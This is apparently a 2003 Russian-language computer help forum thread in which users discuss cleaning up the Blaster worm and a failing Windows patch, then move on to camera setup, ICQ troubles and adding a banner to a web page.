на проги:
http://www.hot.ee/avst/soft_safe.html
"Kaspersky AntiHacker"(С ADSL модемом не работает)
"Outpost Firewall" Скриншоты:

snowbird
15.08.2003, 15:13
И другой:

Eglantine
15.08.2003, 20:26
Попробовала удалить эту папку в Safe Mode, всей папакой не удаляется. Зашла в папку и удалила все файлы из нее, но там есть несколько папок: asms, download, ic, new, update - которые не удаляются, не открываются, при наводе на них курсора выходит надпись, что папка пустая. Вообщем когда пытаюсь открывать эти папки, выходит окошко, что C:\40dc704ed2111e6d2a8a5f5d6c9da0be\asms is not accessible.
Access is denied.
А если пробую удалять, то Cannot delete asms: Access is denied. Make sure the disk is not full or write-protected and that the file is not currently in use.
И место на диске увеличилось всего на 1%, сейчас стало 4%, но вроде больше ничего постороннего нет.

По всем этим пунктам, ничего похожего нет:
Убивание вируса:
1. ОБЯЗАТЕЛЬНО нажми CTRL+SHIFT+ESC, если в списке процессов есть файл msblast.exe, то ЗАВЕРШИ ЕГО!
2. Пуск-выполнить-msconfig-автозагрузка, найди файл msblast.exe и сними с него автозагрузку.
3. В папке \windows\system32 найди этот самый msblast.exe и УБЕЙ ЕГО!

Пыталась снова установить заплатку, но безуспешно, опять ругается: KB823980 Setup Error
Setup could not verify the integrity of the file Update.inf.
Make sure the Cryptographic service is running on this computer.

Может это троян мозги морочит? Вообщем, не так давно Dr.Web обнаружил у меня на компе трояна в двух местах, но лечить не предложил, я все излазила, пыталась найти как вылечить ничего не получилось и я их просто удалила. После этого проверяла Dr. Web неоднократно и Касперским и еще Бог знает чем, ничего не обнаруживалось больше. Незнаю может это все-таки где сидит?
Кошмар какой-то.

snowbird
15.08.2003, 20:38
А ты глянула, включён ли у тебя этот Cryptographic
Service? (Пуск-Панель упр.-Администр.-Сервисы)
Я смотрю, твоё мастерство растёт прямо на глазах!
Скоро станешь продвинутым юзером:appl:

ЗЫ: А те файлы, что не удаляются, наверное защищены системой, как-то ей используются.

Eglantine
15.08.2003, 22:06
В том-то и дело, что включен, но мне в сервисах одна вещь не нравиться, мне кажется ее раньше не было и вообще не должно быть.
Вот:
Name: Error Reporting Service
Description: Allows error reporting for services and applictions running in non-standart environment.
Status: Started
Startup Type: Automatic
Log On As: Local System

snowbird
15.08.2003, 22:24
Первоначальное сообщение от eglantine
В том-то и дело, что включен, но мне в сервисах одна вещь не нравиться, мне кажется ее раньше не было и вообще не должно быть.
Вот:
Name: Error Reporting Service
Description: Allows error reporting for services and applictions running in non-standart environment.
Status: Started
Startup Type: Automatic
Log On As: Local System

Чем же он тебе не нравится? Он просто посылает
отчёт об ошибке в Мелкософт:crazy: У меня он
отключен, чего и тебе советую...

Ramona
23.08.2003, 22:00
купили себе маленькую дигитальную фото-видео-аудио камеру... а вот в установке проблема.... Знаю, что нам надо делать переинсталяцию виндоуса, тьак может это из-за него не пашет???

Starik
23.08.2003, 22:18
Зачем Windows переинсталлировать то? Если камера нормальная, всё легально, то достаточно просто, после всей установки, просто перезапустить Windows. Чето то вы там перемудрили.

CtrlAltDel
24.08.2003, 14:41
....действитна.... втыкаешь, загружаешь винду, она (Винда) при перезагрузке обнаруживает новый дивайс...далее пихаешь прилагающийся к покупке инсталяционный диск и следуешь рекомендациям интуитивно-понятного как грится интерфейса. Успехов!

elle
30.08.2003, 18:05
У меня камера с чипом, а вот качество оставляет желать лучшего. Стала пользоваться программой DCE AutoEnhance.
Но где бы не искала, везде демо версия. Может вы сможете подсказать, где найти нормальный вариант или может вы чем-то другим пользкетесь для улучшения качества фоток???

Alevtina
11.09.2003, 15:11
У меня ася не загружается. Что мне делать?

Ramona
11.09.2003, 15:16
а вот ето плохо....

AlexDeRus
12.09.2003, 21:57
Первоначальное сообщение от Alevtina
У меня ася не загружается. Что мне делать?
что значит не загружается? не может ее скачать или на свой комп установить или просто не запускается ? скажи в чем проблема собссно.

Invincible
12.09.2003, 22:10
Первоначальное сообщение от Alevtina
У меня ася не загружается. Что мне делать? Добавь немного конкретики к своему зову о помощи.. А именно, что у тебя за ICQ? Что ты понимаешь под словом не загружается? (не загружается сама программа или нет связи с сервером icq) Какими "высказываниями" со стороны компутера сопровождается твоя проблема?

Alevtina
13.09.2003, 00:14
Аська матерится по-англицки, а что я в нем смыслю???:sad: Сейчас вроде фурычит. А ася у меня 2003а. И еще открываются только три цветка в "состоянии в сети": красный, зеленый и Awey. А режим невидимости и другие не появляются, блин!

Fej
13.09.2003, 14:52
Помогитееее и мне тоже!!
Мне надо на своей страничке разместить банер, поисковые системы, куда я отправляла свю ссылку, требует чтобы ма моей страничке был размещен их банер. Как мне это сделать?